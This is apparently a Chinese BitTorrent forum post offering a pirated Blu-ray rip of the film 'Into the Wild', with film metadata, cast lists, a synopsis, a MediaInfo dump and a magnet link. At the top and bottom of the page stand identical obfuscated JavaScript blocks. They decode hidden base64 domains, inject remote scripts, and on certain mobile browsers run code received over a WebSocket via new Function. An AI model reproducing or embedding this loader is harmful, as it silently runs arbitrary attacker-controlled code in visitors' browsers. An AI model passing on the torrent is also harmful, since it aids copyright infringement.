荒野生存[简繁字幕].Into.the.Wild.2007.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 13.99GB

版主小s 27天前 316

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 荒野生存 / 浪荡天涯(港) / 阿拉斯加之死(台) / 荒野伴我心

◎片 名 Into the Wild

◎年 代 2007

◎产 地 美国

◎类 别 剧情 / 传记 / 冒险

◎语 言 英语 / 丹麦语

◎上映日期 2007-09-21(美国)

◎IMDb链接 https://www.imdb.com/title/tt0758758/

◎豆瓣评分 8.6/10 (196755人评价)

◎豆瓣链接 https://movie.douban.com/subject/1905462/

◎片 长 148分钟

◎导 演 西恩·潘 Sean Penn (id:1054527)

◎编 剧 西恩·潘 Sean Penn (id:1054527)

乔恩·克拉考尔 Jon Krakauer (id:1000729)

◎演 员 埃米尔·赫斯基 Emile Hirsch (id:1040998)

马西娅·盖伊·哈登 Marcia Gay Harden (id:1025195)

威廉·赫特 William Hurt (id:1031849)

吉娜·马隆 Jena Malone (id:1040982)

布莱恩·H.德里克 Brian H. Dierker (id:1307855)

凯瑟琳·基纳 Catherine Keener (id:1002681)

文斯·沃恩 Vince Vaughn (id:1002673)

克里斯汀·斯图尔特 Kristen Stewart (id:1012533)

哈尔·霍尔布鲁克 Hal Holbrook (id:1006996)

扎克·加利凡纳基斯 Zach Galifianakis (id:1027137)

罗宾·马修斯 Robin Mathews (id:1337969)

史蒂文·韦格 Steven Wiig (id:1171750)

托尔·林德哈特 Thure Lindhardt (id:1014098)

西涅·埃格霍尔姆·奥尔森 Signe Egholm Olsen (id:1186174)

哈莉·拉姆 Haley Ramm (id:1000229)

梅里特·韦弗 Merritt Wever (id:1327603)

John Jabaley John Jabaley (id:1055567)

Joe Dustin (id:1239129)

Alvin Ellie (id:1229319)

Caroline Gelabert (id:1249059)

Aaron Wayne Hill (id:1229216)

J·内森·西蒙斯 J. Nathan Simmons (id:1141234)

巴特 Bart the Bear (id:1440968)

西恩·潘 Sean Penn (id:1054527)

阿特·林森 Art Linson (id:1290103)

David Blocker David Blocker (id:1278810)

约翰·J·凯利 John J. Kelly (id:1019402)

艾迪·韦德 Eddie Vedder (id:1014125)

卡基·金 Kaki King (id:1051131)

迈克尔·布鲁克 Michael Brook (id:1279377)

埃里克·戈蒂耶 Eric Gautier (id:1284627)

杰伊·卡西迪 Jay Cassidy (id:1280253)

弗兰辛·梅思勒 Francine Maisler (id:1025402)

德雷克·R·希尔 Derek R. Hill (id:1286622)

丹妮尔·伯曼 Danielle Berman (id:1278470)

Domenic Silvestri Domenic Silvestri (id:1297605)

Mary Claire Hannan Mary Claire Hannan (id:1285984)

迈克·史密斯森 Mike Smithson (id:1297961)

Sterfon Demings Sterfon Demings (id:1282222)

斯蒂芬妮·朱恩·约翰逊 Stephanie June Johnson (id:1274149)

比特丽斯·德·阿尔巴 Beatrice De Alba (id:1281966)

马克·贝克 Mat Beck (id:1278183)

Todd Daugherty Todd Daugherty (id:1211014)

里克·帕内罗 Rik Panero (id:1211823)

伊莱·贾拉 Eli Jarra (id:1305425)

Rod Park Rod Park (id:1293961)

亚伦·莱希特 Aaron N. Leichter (id:1250710)

Kaz Yoshida Kaz Yoshida (id:1310335)

Matthew Collorafice Matthew Collorafice (id:1053760)

Christina Spring Christina Spring (id:1310322)

Pharoah Barrett Pharoah Barrett (id:1312053)

凯伯·林 Kymber Lim (id:1290053)

Joseph Brattesani Joseph Brattesani (id:1279205)

◎标 签 美国 / 在路上 / 传记 / 自由 / 人生 / 青春 / 真实故事 / 剧情

◎简 介

影片改编自真实的故事,展现了一个理想主义者的传奇,一个流浪的故事。

克里斯托弗(埃米尔?赫斯基 饰)家境优渥,是亚特兰大私立名校艾莫里的优等生,前程似锦。但是,他从学校毕业后,选择了截然不同的人生,放弃令人羡慕的工作,把存款捐给慈善机构,去阿拉斯加寻找自我。在家人的劝阻声中,他踏上了回归自然的慢慢长路,成为名副其实的流浪者。

一路上,他遇到不少人,也数次遭受野外生存的挑战,每一步都充满了艰辛,他以坚韧的毅力,实践着寻找自我的梦想……

◎获奖情况 (共5项)

第80届奥斯卡金像奖 (2008)

最佳男配角(提名)

└──哈尔·霍尔布鲁克 (id:1006996)

最佳剪辑(提名)

└──杰伊·卡西迪 (id:1280253)

第65届金球奖 (2008)

电影类 最佳原创配乐(提名)

电影类 最佳原创歌曲

└──艾迪·韦德 (id:1014125)

第8届美国电影学会奖 (2007)

年度佳片

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 208804394146453260726274403085004972440 (0x9D164376168308D0B66C94C26C162198)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 14.0 GiB

  8. Duration : 2 h 28 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 13.5 Mb/s

  11. Encoded date : UTC 2021-11-05 03:20:42

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 28 min

  21. Bit rate : 11.3 Mb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.306

  31. Stream size : 11.7 GiB (84%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 11284 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=213348 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 2 h 28 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 180 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 2.26 GiB (16%)

  58. Title : English DTS-HD Master Audio 5.1 @ 2180 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 2 h 27 min

  68. Bit rate : 16.8 kb/s

  69. Count of elements : 2364

  70. Stream size : 17.7 MiB (0%)

  71. Title : Chs/SUP 简体

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 2 h 27 min

  81. Bit rate : 17.0 kb/s

  82. Count of elements : 2364

  83. Stream size : 18.0 MiB (0%)

  84. Title : Cht/SUP 繁体

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:08:18.331 : en:第 02 章

  91. 00:13:48.786 : en:第 03 章

  92. 00:21:41.842 : en:第 04 章

  93. 00:28:14.776 : en:第 05 章

  94. 00:38:14.626 : en:第 06 章

  95. 00:43:05.583 : en:第 07 章

  96. 00:52:25.559 : en:第 08 章

  97. 01:02:52.519 : en:第 09 章

  98. 01:09:59.612 : en:第 10 章

  99. 01:14:31.884 : en:第 11 章

  100. 01:22:24.439 : en:第 12 章

  101. 01:30:23.877 : en:第 13 章

  102. 01:46:00.479 : en:第 14 章

  103. 01:51:49.828 : en:第 15 章

  104. 02:04:27.877 : en:第 16 章

  105. 02:15:31.498 : en:第 17 章




复制代码


TAGS 冒险 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:9B2A9B3A1E51A0F1061BE477A0EB4FD2FEA2FEC2

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};